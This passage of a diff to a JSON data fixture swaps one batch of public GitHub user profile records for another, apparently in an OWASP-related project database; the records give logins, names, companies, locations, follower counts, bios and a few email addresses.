"following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2014-11-30T06:56:00Z", - "updated_at": "2024-03-09T02:54:08Z", - "node_id": "MDQ6VXNlcjEwMDA3MzY4", + "followers_count": 0, + "public_gists_count": 9, + "public_repositories_count": 14, + "created_at": "2012-03-06T19:34:32Z", + "updated_at": "2024-08-02T10:19:01Z", + "node_id": "MDQ6VXNlcjE1MDg1NjA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -431303,24 +691152,24 @@ }, { "model": "github.user", - "pk": 2843, + "pk": 8210, "fields": { - "nest_created_at": "2024-09-12T02:29:16.024Z", - "nest_updated_at": "2024-09-12T02:29:16.024Z", - "name": "", - "login": "awesoemgaming", + "nest_created_at": "2024-09-22T09:44:51.678Z", + "nest_updated_at": "2024-09-22T19:43:55.043Z", + "name": "Zadjad Rezai", + "login": "zadjadr", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/129987735?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/121857296?v=4", + "company": "@dbdrive ", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 5, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2023-04-05T17:47:27Z", - "updated_at": "2024-06-27T02:51:29Z", - "node_id": "U_kgDOB790lw", + "public_repositories_count": 36, + "created_at": "2023-01-03T08:51:27Z", + "updated_at": "2024-09-18T08:52:31Z", + "node_id": "U_kgDOB0NlEA", "bio": "", "is_hireable": false, "twitter_username": "" @@ -431328,49 +691177,49 @@ }, { "model": "github.user", - "pk": 2844, + "pk": 8211, "fields": { - "nest_created_at": "2024-09-12T02:29:17.793Z", - "nest_updated_at": "2024-09-12T02:29:17.793Z", - "name": "Location", - "login": "James-Lu-none", + "nest_created_at": "2024-09-22T09:44:53.301Z", + "nest_updated_at": "2024-09-22T19:43:56.603Z", + "name": "Vladyslav Samoilenko", + "login": "saymolet", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/59411633?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/101016860?v=4", + "company": "National aviation university", "location": "", "collaborators_count": 0, - "following_count": 21, - "followers_count": 5, + "following_count": 16, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 38, - "created_at": "2020-01-01T11:55:32Z", - "updated_at": "2024-09-11T04:30:31Z", - "node_id": "MDQ6VXNlcjU5NDExNjMz", - "bio": "", + "public_repositories_count": 8, + "created_at": "2022-03-05T18:26:02Z", + "updated_at": "2024-09-07T19:34:19Z", + "node_id": "U_kgDOBgVlHA", + "bio": "DevOps Engineer @ SoftServe", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2845, + "pk": 8212, "fields": { - "nest_created_at": "2024-09-12T02:29:21.664Z", - "nest_updated_at": "2024-09-12T02:29:21.664Z", - "name": "", - "login": "joonhwa", + "nest_created_at": "2024-09-22T09:44:53.629Z", + "nest_updated_at": "2024-09-22T19:43:56.922Z", + "name": "Sonny Dineen", + "login": "pseudobeard", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10021536?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9921283?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 2, - "public_repositories_count": 15, - "created_at": "2014-12-01T08:08:14Z", - "updated_at": "2024-07-25T01:41:56Z", - "node_id": "MDQ6VXNlcjEwMDIxNTM2", + "followers_count": 44, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2014-11-23T23:50:53Z", + "updated_at": "2024-03-31T02:53:18Z", + "node_id": "MDQ6VXNlcjk5MjEyODM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -431378,99 +691227,99 @@ }, { "model": "github.user", - "pk": 2846, + "pk": 8213, "fields": { - "nest_created_at": "2024-09-12T02:29:23.643Z", - "nest_updated_at": "2024-09-12T02:29:23.643Z", - "name": "Mithun Vaidhyanathan", - "login": "earthling1984", + "nest_created_at": "2024-09-22T09:44:53.949Z", + "nest_updated_at": "2024-09-22T19:43:57.242Z", + "name": "Sharjeel Aziz", + "login": "sharjeelaziz", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/19665196?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/225577?v=4", + "company": "@CivicActions ", + "location": "Falls Church VA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2016-05-31T10:03:56Z", - "updated_at": "2024-07-23T16:37:30Z", - "node_id": "MDQ6VXNlcjE5NjY1MTk2", - "bio": "", + "following_count": 76, + "followers_count": 19, + "public_gists_count": 15, + "public_repositories_count": 24, + "created_at": "2010-03-18T18:55:24Z", + "updated_at": "2024-09-13T16:32:18Z", + "node_id": "MDQ6VXNlcjIyNTU3Nw==", + "bio": "dad, techie, code crafter, neogeographer, OSMer, tinkerer, gadgeteer, ham (K0DEV), drones, 🏃🏻 & 🚴.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2847, + "pk": 8214, "fields": { - "nest_created_at": "2024-09-12T02:29:27.432Z", - "nest_updated_at": "2024-09-12T02:29:27.432Z", - "name": "", - "login": "nosed07", + "nest_created_at": "2024-09-22T09:44:54.302Z", + "nest_updated_at": "2024-09-22T19:43:57.559Z", + "name": "Max", + "login": "coffeemakingtoaster", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/72928905?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/48368581?v=4", + "company": "@iteratec", + "location": "Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-10-15T13:51:56Z", - "updated_at": "2024-08-17T16:41:19Z", - "node_id": "MDQ6VXNlcjcyOTI4OTA1", - "bio": "", + "following_count": 28, + "followers_count": 20, + "public_gists_count": 1, + "public_repositories_count": 20, + "created_at": "2019-03-08T22:15:40Z", + "updated_at": "2024-09-14T11:57:48Z", + "node_id": "MDQ6VXNlcjQ4MzY4NTgx", + "bio": "Backend developer because I am scared of CSS. \r\nMostly using k8s, Python and golang for whatever I do", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2848, + "pk": 8215, "fields": { - "nest_created_at": "2024-09-12T02:29:28.246Z", - "nest_updated_at": "2024-09-18T19:10:43.758Z", - "name": "Adrien {Adaute}", - "login": "adaute", + "nest_created_at": "2024-09-22T09:44:54.608Z", + "nest_updated_at": "2024-09-22T19:43:57.871Z", + "name": "Adrian Alexander Eriksen", + "login": "adrianeriksen", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13275059?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5208030?v=4", + "company": "Advisense", + "location": "Bergen", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2015-07-10T14:08:18Z", - "updated_at": "2023-09-09T20:11:49Z", - "node_id": "MDQ6VXNlcjEzMjc1MDU5", - "bio": "", + "following_count": 7, + "followers_count": 11, + "public_gists_count": 1, + "public_repositories_count": 8, + "created_at": "2013-08-11T15:03:26Z", + "updated_at": "2024-09-04T18:48:17Z", + "node_id": "MDQ6VXNlcjUyMDgwMzA=", + "bio": "Penguin", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2849, + "pk": 8216, "fields": { - "nest_created_at": "2024-09-12T02:29:36.433Z", - "nest_updated_at": "2024-09-12T02:29:36.434Z", + "nest_created_at": "2024-09-22T09:44:55.917Z", + "nest_updated_at": "2024-09-22T19:43:59.156Z", "name": "", - "login": "webgoat-github", + "login": "Nullwar3", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32959481?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/26093886?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 21, + "following_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2017-10-20T13:14:09Z", - "updated_at": "2021-03-30T10:29:59Z", - "node_id": "MDQ6VXNlcjMyOTU5NDgx", + "public_repositories_count": 4, + "created_at": "2017-02-28T17:28:28Z", + "updated_at": "2024-09-08T10:56:11Z", + "node_id": "MDQ6VXNlcjI2MDkzODg2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -431478,199 +691327,199 @@ }, { "model": "github.user", - "pk": 2850, + "pk": 8217, "fields": { - "nest_created_at": "2024-09-12T02:29:37.267Z", - "nest_updated_at": "2024-09-12T02:29:38.091Z", - "name": "Doug Morato", - "login": "dougmorato", - "email": "dm@corp.io", - "avatar_url": "https://avatars.githubusercontent.com/u/9654?v=4", - "company": "@cybernetikco ", - "location": "Boca Raton, FL - USA", + "nest_created_at": "2024-09-22T09:45:10.716Z", + "nest_updated_at": "2024-09-22T19:44:14.119Z", + "name": "Mohit Anand", + "login": "mohitanand001", + "email": "anand.mohit001@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/16963976?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 32, - "followers_count": 93, - "public_gists_count": 16, - "public_repositories_count": 67, - "created_at": "2008-05-08T03:25:04Z", - "updated_at": "2024-08-12T18:38:06Z", - "node_id": "MDQ6VXNlcjk2NTQ=", - "bio": "Beloved Son of Heavenly Father, Happily Married & In Love, Father of 3, 🇧🇷🇺🇸\r\nPassionate about life. ", + "following_count": 171, + "followers_count": 49, + "public_gists_count": 0, + "public_repositories_count": 132, + "created_at": "2016-01-29T20:07:56Z", + "updated_at": "2024-09-01T11:32:15Z", + "node_id": "MDQ6VXNlcjE2OTYzOTc2", + "bio": "curious", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2851, + "pk": 8218, "fields": { - "nest_created_at": "2024-09-12T02:29:51.526Z", - "nest_updated_at": "2024-09-18T19:11:14.272Z", - "name": "OWASP OWTF", - "login": "owtf", - "email": "owasp_owtf_developers@lists.owasp.org", - "avatar_url": "https://avatars.githubusercontent.com/u/1230211?v=4", - "company": "", - "location": "Pwnageland", + "nest_created_at": "2024-09-22T09:45:11.700Z", + "nest_updated_at": "2024-09-22T19:44:15.110Z", + "name": "Raghav Jajodia", + "login": "jajodiaraghav", + "email": "jajodia.raghav@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/18749480?v=4", + "company": "Goldman Sachs", + "location": "Bangalore", "collaborators_count": 0, "following_count": 0, - "followers_count": 33, - "public_gists_count": 0, - "public_repositories_count": 26, - "created_at": "2011-11-30T08:25:21Z", - "updated_at": "2018-03-26T17:16:12Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjEyMzAyMTE=", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "followers_count": 101, + "public_gists_count": 3, + "public_repositories_count": 6, + "created_at": "2016-04-30T08:39:45Z", + "updated_at": "2024-07-01T13:12:45Z", + "node_id": "MDQ6VXNlcjE4NzQ5NDgw", + "bio": "Women in Tech Advocate :: Diversity Mentor", + "is_hireable": true, + "twitter_username": "jajodiaraghav" } }, { "model": "github.user", - "pk": 2852, + "pk": 8219, "fields": { - "nest_created_at": "2024-09-12T02:29:55.143Z", - "nest_updated_at": "2024-09-12T02:29:56.372Z", - "name": "Abraham Aranguren", - "login": "7a", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1230243?v=4", - "company": "7ASecurity", - "location": "Bromberg", + "nest_created_at": "2024-09-22T09:45:12.343Z", + "nest_updated_at": "2024-09-22T19:44:15.758Z", + "name": "S Rahul Badami", + "login": "srahulbadami", + "email": "srahulbadami@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/22706287?v=4", + "company": "@Perpule1248 @betafactory ", + "location": "Bengaluru South, India", "collaborators_count": 0, "following_count": 1, - "followers_count": 60, + "followers_count": 27, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2011-11-30T08:45:55Z", - "updated_at": "2024-08-26T17:19:31Z", - "node_id": "MDQ6VXNlcjEyMzAyNDM=", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "public_repositories_count": 47, + "created_at": "2016-10-08T10:06:13Z", + "updated_at": "2024-07-07T10:38:46Z", + "node_id": "MDQ6VXNlcjIyNzA2Mjg3", + "bio": "Google Summer of Code 2020 @OWASP. Contributor @Bugheist.\r\nGoogle Summer of Code 2020 @OWASP. Contributor @BLT.", + "is_hireable": true, + "twitter_username": "srahulbadami" } }, { "model": "github.user", - "pk": 2853, + "pk": 8220, "fields": { - "nest_created_at": "2024-09-12T02:29:56.768Z", - "nest_updated_at": "2024-09-12T02:31:20.241Z", - "name": "Viyat", - "login": "viyatb", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4557897?v=4", - "company": "@owtf ", - "location": "/dev/null", + "nest_created_at": "2024-09-22T09:45:12.666Z", + "nest_updated_at": "2024-09-22T19:44:16.116Z", + "name": "Siddharth Goyal", + "login": "sid22", + "email": "goyal.siddharth22@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/17125030?v=4", + "company": "@scaledata @owasp", + "location": "India", "collaborators_count": 0, - "following_count": 6, - "followers_count": 83, - "public_gists_count": 58, - "public_repositories_count": 11, - "created_at": "2013-05-29T08:41:34Z", - "updated_at": "2024-09-10T17:12:14Z", - "node_id": "MDQ6VXNlcjQ1NTc4OTc=", - "bio": "Project co-lead @owtf", + "following_count": 36, + "followers_count": 41, + "public_gists_count": 5, + "public_repositories_count": 47, + "created_at": "2016-02-08T14:54:13Z", + "updated_at": "2024-08-31T18:48:43Z", + "node_id": "MDQ6VXNlcjE3MTI1MDMw", + "bio": "Software Engineer at Rubrik Inc.\r\n\r\nOpen Source @OWASP", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2854, + "pk": 8221, "fields": { - "nest_created_at": "2024-09-12T02:29:58.430Z", - "nest_updated_at": "2024-09-18T18:22:39.586Z", - "name": "Anant Shrivastava", - "login": "anantshri", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/236843?v=4", - "company": "InfoSec Professional", - "location": "Bhopal India", + "nest_created_at": "2024-09-22T09:45:12.986Z", + "nest_updated_at": "2024-09-22T19:44:16.426Z", + "name": "Neethu Mariya Joy", + "login": "Roboneet", + "email": "neethumariyajoy@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/20015262?v=4", + "company": "Google", + "location": "Bangalore", "collaborators_count": 0, - "following_count": 37, - "followers_count": 430, - "public_gists_count": 19, - "public_repositories_count": 41, - "created_at": "2010-04-04T20:17:30Z", - "updated_at": "2024-08-19T13:09:19Z", - "node_id": "MDQ6VXNlcjIzNjg0Mw==", - "bio": "Project Leader for @TamerPlatform and @CodeVigilant ", + "following_count": 103, + "followers_count": 118, + "public_gists_count": 6, + "public_repositories_count": 66, + "created_at": "2016-06-18T15:12:00Z", + "updated_at": "2023-07-25T10:09:32Z", + "node_id": "MDQ6VXNlcjIwMDE1MjYy", + "bio": "Software Engineer ", "is_hireable": false, - "twitter_username": "anantshri" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2855, + "pk": 8222, "fields": { - "nest_created_at": "2024-09-12T02:30:26.305Z", - "nest_updated_at": "2024-09-12T02:30:26.305Z", - "name": "jose nazario", - "login": "paralax", + "nest_created_at": "2024-09-22T09:45:13.632Z", + "nest_updated_at": "2024-09-22T19:44:17.073Z", + "name": "Pulkit Agrawal", + "login": "errorassassin", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5619153?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/47253186?v=4", "company": "", - "location": "ann arbor, mi", + "location": "Delhi, India", "collaborators_count": 0, - "following_count": 1, - "followers_count": 668, - "public_gists_count": 65, - "public_repositories_count": 325, - "created_at": "2013-10-05T18:54:01Z", - "updated_at": "2024-09-02T11:24:55Z", - "node_id": "MDQ6VXNlcjU2MTkxNTM=", - "bio": "cybersecurity, threat intel, cooking, biochemistry.", - "is_hireable": true, - "twitter_username": "jnazario" + "following_count": 5, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2019-02-01T16:34:21Z", + "updated_at": "2024-09-14T11:57:01Z", + "node_id": "MDQ6VXNlcjQ3MjUzMTg2", + "bio": "Undergrad at IIT Delhi | Passionate Full Stack Web Dev | Competitive Programmer", + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 2856, + "pk": 8223, "fields": { - "nest_created_at": "2024-09-12T02:30:27.105Z", - "nest_updated_at": "2024-09-12T02:30:27.921Z", - "name": "Diógenes Fernandes", - "login": "diofeher", - "email": "diofeher@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/161360?v=4", + "nest_created_at": "2024-09-22T09:45:14.589Z", + "nest_updated_at": "2024-09-22T19:44:18.049Z", + "name": "Ankit Kokane", + "login": "thedudeontitan", + "email": "ankitkokane90@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/97180942?v=4", "company": "", - "location": "João Pessoa - PB", + "location": "", "collaborators_count": 0, - "following_count": 33, - "followers_count": 151, - "public_gists_count": 41, - "public_repositories_count": 54, - "created_at": "2009-12-03T12:19:31Z", - "updated_at": "2024-08-03T08:37:52Z", - "node_id": "MDQ6VXNlcjE2MTM2MA==", - "bio": "staff platform engineer", - "is_hireable": true, - "twitter_username": "" + "following_count": 18, + "followers_count": 40, + "public_gists_count": 2, + "public_repositories_count": 61, + "created_at": "2022-01-05T15:42:02Z", + "updated_at": "2024-09-21T11:07:16Z", + "node_id": "U_kgDOBcrdDg", + "bio": "GSOC @OWASP | LFX @Linux | Google DSC Lead | Freelancer @web @android | 10x Hackathon winner | Full Stack Web/Blockchain Dev", + "is_hireable": false, + "twitter_username": "ankitkokane" } }, { "model": "github.user", - "pk": 2857, + "pk": 8224, "fields": { - "nest_created_at": "2024-09-12T02:30:28.722Z", - "nest_updated_at": "2024-09-12T02:30:28.722Z", - "name": "Jan Stourac", - "login": "jstourac", + "nest_created_at": "2024-09-22T09:45:14.910Z", + "nest_updated_at": "2024-09-22T19:44:18.370Z", + "name": "Cody", + "login": "co-decode", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12250881?v=4", - "company": "Red Hat", - "location": "Czech Republic", + "avatar_url": "https://avatars.githubusercontent.com/u/103092293?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 7, + "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 53, - "created_at": "2015-05-05T10:41:50Z", - "updated_at": "2024-09-11T12:20:05Z", - "node_id": "MDQ6VXNlcjEyMjUwODgx", + "public_repositories_count": 18, + "created_at": "2022-04-06T04:18:02Z", + "updated_at": "2024-01-05T13:47:01Z", + "node_id": "U_kgDOBiUQRQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -431678,24 +691527,49 @@ }, { "model": "github.user", - "pk": 2858, + "pk": 8225, "fields": { - "nest_created_at": "2024-09-12T02:30:29.538Z", - "nest_updated_at": "2024-09-12T02:30:57.411Z", - "name": "Anton Bolshakov", - "login": "blshkv", + "nest_created_at": "2024-09-22T09:45:15.546Z", + "nest_updated_at": "2024-09-22T19:44:19.003Z", + "name": "", + "login": "ATHARVA-GAWAS", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/309751?v=4", - "company": "ITDefence", + "avatar_url": "https://avatars.githubusercontent.com/u/111885892?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 6, - "followers_count": 83, + "following_count": 1, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 44, + "created_at": "2022-08-23T13:47:34Z", + "updated_at": "2024-09-07T15:54:42Z", + "node_id": "U_kgDOBqs-RA", + "bio": "", + "is_hireable": true, + "twitter_username": "Atharva___Gawas" + } +}, +{ + "model": "github.user", + "pk": 8226, + "fields": { + "nest_created_at": "2024-09-22T09:45:16.194Z", + "nest_updated_at": "2024-09-22T19:44:19.630Z", + "name": "Abhinav Kumar", + "login": "kr-2003", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/96587705?v=4", + "company": "", + "location": "India", + "collaborators_count": 0, + "following_count": 22, + "followers_count": 10, "public_gists_count": 1, - "public_repositories_count": 29, - "created_at": "2010-06-20T02:21:34Z", - "updated_at": "2024-08-26T21:38:42Z", - "node_id": "MDQ6VXNlcjMwOTc1MQ==", + "public_repositories_count": 82, + "created_at": "2021-12-23T15:58:18Z", + "updated_at": "2024-09-13T20:16:53Z", + "node_id": "U_kgDOBcHPuQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -431703,49 +691577,74 @@ }, { "model": "github.user", - "pk": 2859, + "pk": 8227, "fields": { - "nest_created_at": "2024-09-12T02:30:30.378Z", - "nest_updated_at": "2024-09-12T02:30:30.378Z", - "name": "Martin Bobak", - "login": "bobekebob", - "email": "martin.bobak@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6470010?v=4", + "nest_created_at": "2024-09-22T09:45:17.146Z", + "nest_updated_at": "2024-09-22T19:44:20.575Z", + "name": "Harsh Natuskar", + "login": "hurrrsh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/74592384?v=4", "company": "", - "location": "", + "location": "Spiritual Realm", "collaborators_count": 0, - "following_count": 2, - "followers_count": 2, + "following_count": 24, + "followers_count": 10, "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2014-01-22T10:02:16Z", - "updated_at": "2024-07-25T07:46:18Z", - "node_id": "MDQ6VXNlcjY0NzAwMTA=", + "public_repositories_count": 14, + "created_at": "2020-11-17T08:50:49Z", + "updated_at": "2024-07-31T18:28:14Z", + "node_id": "MDQ6VXNlcjc0NTkyMzg0", "bio": "", + "is_hireable": false, + "twitter_username": "hurrrsh" + } +}, +{ + "model": "github.user", + "pk": 8228, + "fields": { + "nest_created_at": "2024-09-22T09:45:17.473Z", + "nest_updated_at": "2024-09-22T19:44:20.898Z", + "name": "Rohit Lodha", + "login": "rtgdk", + "email": "rohit.lodhartg@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/17159160?v=4", + "company": "@spdx @SSMS-Pilani ", + "location": "Jaipur", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 33, + "public_gists_count": 2, + "public_repositories_count": 64, + "created_at": "2016-02-10T11:11:33Z", + "updated_at": "2024-09-22T11:08:25Z", + "node_id": "MDQ6VXNlcjE3MTU5MTYw", + "bio": "Rhapsodic Developer, GSOC 2017, Google Code-In Mentor, GSOC Mentor", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2860, + "pk": 8229, "fields": { - "nest_created_at": "2024-09-12T02:30:31.205Z", - "nest_updated_at": "2024-09-12T02:30:31.205Z", - "name": "", - "login": "lijodigiledge", + "nest_created_at": "2024-09-22T09:45:18.152Z", + "nest_updated_at": "2024-09-22T19:44:21.528Z", + "name": "Matheus Phillipo", + "login": "MattSilverio", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/39552643?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/18178688?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 15, + "followers_count": 23, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2018-05-23T09:05:11Z", - "updated_at": "2019-10-09T09:45:32Z", - "node_id": "MDQ6VXNlcjM5NTUyNjQz", + "public_repositories_count": 53, + "created_at": "2016-03-30T23:31:37Z", + "updated_at": "2024-08-31T11:19:29Z", + "node_id": "MDQ6VXNlcjE4MTc4Njg4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -431753,24 +691652,24 @@ }, { "model": "github.user", - "pk": 2861, + "pk": 8230, "fields": { - "nest_created_at": "2024-09-12T02:30:32.037Z", - "nest_updated_at": "2024-09-12T02:30:32.037Z", - "name": "", - "login": "naveenrajamannar", + "nest_created_at": "2024-09-22T09:45:18.471Z", + "nest_updated_at": "2024-09-22T19:44:21.848Z", + "name": "Manthan Sharma", + "login": "manthan-sharma-23", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8857538?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/143496678?v=4", "company": "", - "location": "", + "location": "India", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 26, + "followers_count": 11, "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2014-09-22T06:51:15Z", - "updated_at": "2024-07-30T04:23:25Z", - "node_id": "MDQ6VXNlcjg4NTc1Mzg=", + "public_repositories_count": 39, + "created_at": "2023-08-29T09:09:59Z", + "updated_at": "2024-09-22T13:41:19Z", + "node_id": "U_kgDOCI2V5g", "bio": "", "is_hireable": false, "twitter_username": "" @@ -431778,124 +691677,124 @@ }, { "model": "github.user", - "pk": 2862, + "pk": 8231, "fields": { - "nest_created_at": "2024-09-12T02:30:32.847Z", - "nest_updated_at": "2024-09-12T02:30:32.847Z", - "name": "Oskar Zabik", - "login": "smogg", - "email": "oskar.zabik@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1500714?v=4", - "company": "fragmentapp.io", + "nest_created_at": "2024-09-22T09:45:18.790Z", + "nest_updated_at": "2024-09-22T19:44:22.163Z", + "name": "", + "login": "Kej-r03", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/99071926?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 6, - "public_gists_count": 8, - "public_repositories_count": 37, - "created_at": "2012-03-04T22:43:54Z", - "updated_at": "2024-06-10T08:38:08Z", - "node_id": "MDQ6VXNlcjE1MDA3MTQ=", + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 30, + "created_at": "2022-02-05T09:09:48Z", + "updated_at": "2024-09-15T10:40:54Z", + "node_id": "U_kgDOBee3tg", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2863, + "pk": 8232, "fields": { - "nest_created_at": "2024-09-12T02:30:33.654Z", - "nest_updated_at": "2024-09-12T02:30:33.654Z", - "name": "Jeff Blane", - "login": "synthet1c-info", + "nest_created_at": "2024-09-22T09:45:19.117Z", + "nest_updated_at": "2024-09-22T19:44:22.491Z", + "name": "Bhawna ", + "login": "ConnectBhawna", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7847153?v=4", - "company": "", - "location": "Earth", + "avatar_url": "https://avatars.githubusercontent.com/u/81790585?v=4", + "company": "shebuilds", + "location": "India,Delhi", "collaborators_count": 0, - "following_count": 41, - "followers_count": 10, - "public_gists_count": 1, - "public_repositories_count": 6, - "created_at": "2014-06-10T08:36:38Z", - "updated_at": "2024-08-25T12:43:37Z", - "node_id": "MDQ6VXNlcjc4NDcxNTM=", - "bio": "OSCP |\r\nOSWP |\r\neWPTXv2        \r\nJust another infosec n00b 🌍 \r\n", + "following_count": 86, + "followers_count": 288, + "public_gists_count": 0, + "public_repositories_count": 132, + "created_at": "2021-04-02T03:32:13Z", + "updated_at": "2024-09-22T12:36:21Z", + "node_id": "MDQ6VXNlcjgxNzkwNTg1", + "bio": "Founder @SheBuilds || Github Campus Expert || XROS'23 @Monado || MLH Fellow'22 & Mentor ", "is_hireable": false, - "twitter_username": "" + "twitter_username": "ConnectBhawna" } }, { "model": "github.user", - "pk": 2864, + "pk": 8233, "fields": { - "nest_created_at": "2024-09-12T02:30:34.496Z", - "nest_updated_at": "2024-09-12T02:30:45.795Z", - "name": "", - "login": "Ashrith-Shetty", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/52630129?v=4", + "nest_created_at": "2024-09-22T09:45:19.432Z", + "nest_updated_at": "2024-09-22T19:44:22.799Z", + "name": "Daemon", + "login": "daemon-reconfig", + "email": "mehulishi27@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/69844188?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 6, - "followers_count": 7, - "public_gists_count": 1, - "public_repositories_count": 9, - "created_at": "2019-07-07T14:58:16Z", - "updated_at": "2024-07-05T13:15:04Z", - "node_id": "MDQ6VXNlcjUyNjMwMTI5", + "following_count": 7, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 34, + "created_at": "2020-08-18T08:52:57Z", + "updated_at": "2024-08-26T11:41:02Z", + "node_id": "MDQ6VXNlcjY5ODQ0MTg4", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2865, + "pk": 8234, "fields": { - "nest_created_at": "2024-09-12T02:30:37.200Z", - "nest_updated_at": "2024-09-12T02:30:37.200Z", - "name": "OxMarco", - "login": "OxMarco", + "nest_created_at": "2024-09-22T09:45:19.750Z", + "nest_updated_at": "2024-09-22T19:44:23.115Z", + "name": "Manish Bisht", + "login": "ManishBisht777", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10283625?v=4", - "company": "", - "location": "Somewhere in Europe", + "avatar_url": "https://avatars.githubusercontent.com/u/89926834?v=4", + "company": "manishbishtdev@gmail.com", + "location": "Delhi, India", "collaborators_count": 0, - "following_count": 2, - "followers_count": 61, - "public_gists_count": 9, - "public_repositories_count": 46, - "created_at": "2014-12-23T20:04:21Z", - "updated_at": "2024-09-10T11:06:14Z", - "node_id": "MDQ6VXNlcjEwMjgzNjI1", - "bio": "Doing stuff at the edge of hardware and software", + "following_count": 68, + "followers_count": 135, + "public_gists_count": 2, + "public_repositories_count": 92, + "created_at": "2021-09-01T14:57:51Z", + "updated_at": "2024-08-30T04:54:18Z", + "node_id": "MDQ6VXNlcjg5OTI2ODM0", + "bio": "Software engineer @castledio | Freelance Web Developer @fiverr", "is_hireable": true, - "twitter_username": 